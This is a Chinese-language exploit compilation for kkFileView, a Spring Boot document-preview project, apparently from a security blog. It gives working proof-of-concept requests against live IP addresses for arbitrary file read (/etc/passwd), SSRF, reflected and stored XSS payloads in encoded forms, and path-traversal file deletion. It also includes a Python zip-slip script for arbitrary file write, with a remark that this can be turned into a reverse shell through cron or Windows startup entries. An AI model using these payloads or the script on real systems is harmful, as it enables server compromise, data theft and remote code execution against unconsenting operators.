项目介绍
Keking KkFileview是中国凯京科技(Keking)公司的一个以Spring Boot打造文件文档在线预览项目
1-任意文件读取漏洞
影响版本
kkFileview <=3.6.0
漏洞证明
http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd
2-SSRF漏洞
影响版本
kkFileview =v4.1.0
漏洞证明
http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn
3-XSS漏洞
漏洞影响
kkFileview =v4.1.0
漏洞证明
http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20οnerrοr=alert(0)%3E
http://www.baidu.com/test.txt"><img src=111 οnerrοr=alert(1)>
编码base64:
aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==
url编码:aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D
http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D
<svg/οnlοad=alert(1)>
编码base64:
PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+
url编码:
PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B
http://119.91.146.127:8012/picturesPreview?urls=¤tUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B
4-任意文件上传导致存储xss
漏洞影响
kkFileView=4.1.0
漏洞证明
访问上传的文件
http://139.9.101.60:8012/demo/2.html
5-任意文件删除
漏洞影响
kkFileview= v4.0.0
漏洞证明
/deleteFile?fileName=demo%2F..\xss.pdf
get请求此uri会删除\kkFileView-master\server\src\main\file目录中的xss.pdf(原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件)
6.任意文件上传导致远程执行漏洞
漏洞影响
4.2.0-4.4.0
漏洞证明
制作恶意hack.zip
,注意里面必须有一个正常文件,例如test
,便于创建hack.zip_
缓存文件
这个poc的含义是在指定文件/AAA/flag中写入test_Yu9
import zipfile
if __name__ == "__main__":
try:
binary1 = b'test'
binary2 = b'test_Yu9'
zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)
info = zipfile.ZipInfo("hack.zip")
zipFile.writestr("test", binary1)
zipFile.writestr("../../../../../../../../../../../../../../../../../../../AAA/flag", binary2)
zipFile.close()
except IOError as e:
raise e
上传压缩包并点击预览
- 在linux下且高权限的情况下,可以通过写入计划任务反弹shell。
- 在windows下高权下可以通过写自启动 的方式getshell。
参考